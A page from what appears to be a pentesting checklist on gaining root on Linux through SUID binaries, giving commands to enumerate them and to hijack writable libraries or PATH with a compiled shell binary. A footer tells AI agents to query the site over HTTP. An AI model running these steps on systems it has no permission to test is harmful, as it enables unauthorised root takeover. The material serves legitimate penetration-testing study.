# SUID Binaries

### Overview

SUID (Set User ID) is a special permission bit that allows a file to run with the **permissions of its owner**, not the user executing it.

### Why this Works

This technique works because:

* The SUID bit causes the binary to execute as root
* Some binaries allow:
  * Shell escapes
  * Arbitrary command execution
  * File writes

### Prerequisites

For this PrivEsc path to work:

* Local access as a non-root user
* At least one root-owned SUID binary
* The binary must:
  * Be vulnerable, or
  * Support command execution/shell escape

### Steps

1. Enumerate SUID Binaries:

   ```bash
   find / -perm -4000 -type f 2>/dev/null
   find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
   find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} 2> /dev/null \;
   ```
2. Check if [gtfobins](https://gtfobins.org/) has any SUID binaries listed to exploit.&#x20;

### Other paths of exploitation

1. Check if there are any versions of SUID binaries (Can be custom) which are vulnerable to privilege escalation exploits and have the exploit code in ExploitDB or github.
2. Check if the SUID binary loads all of its shared libraries correctly. We can also check if the **SUID** binary is loading a library from a folder **where we can write.** Example:

   ```bash
   strace binary1 2>&1 | grep -i -E "open|access|no such file"
   ```

&#x20;     If the path is writable, you can overwrite it (More details in Reference 1).

3. A new executable **inherits a copy of the parent process’s environment variables**, including `PATH` . When the shell launches a program (via `execve()`), it **passes its environment** to the new process. If the SUID binary does something like `system('backup');` and the attacker modifies PATH to `export PATH=/tmp:$PATH` and places a malicious `backup` in `/tmp` , the SUID program will execute that **with root privileges**.&#x20;

   ```bash
   # To check if the binary is running any commands 
   strings binary2
   # Compile the C file which gives us a shell
   gcc -o service service.c
   # Modify the path
   export PATH=.:$PATH binary2
   ```

### References

1. <https://github.com/v4resk/red-book/blob/main/redteam/privilege-escalation/linux/suid-binaries.md#shared-library-hijacking>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/linux/linux-privilege-escalation/suid-binaries.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.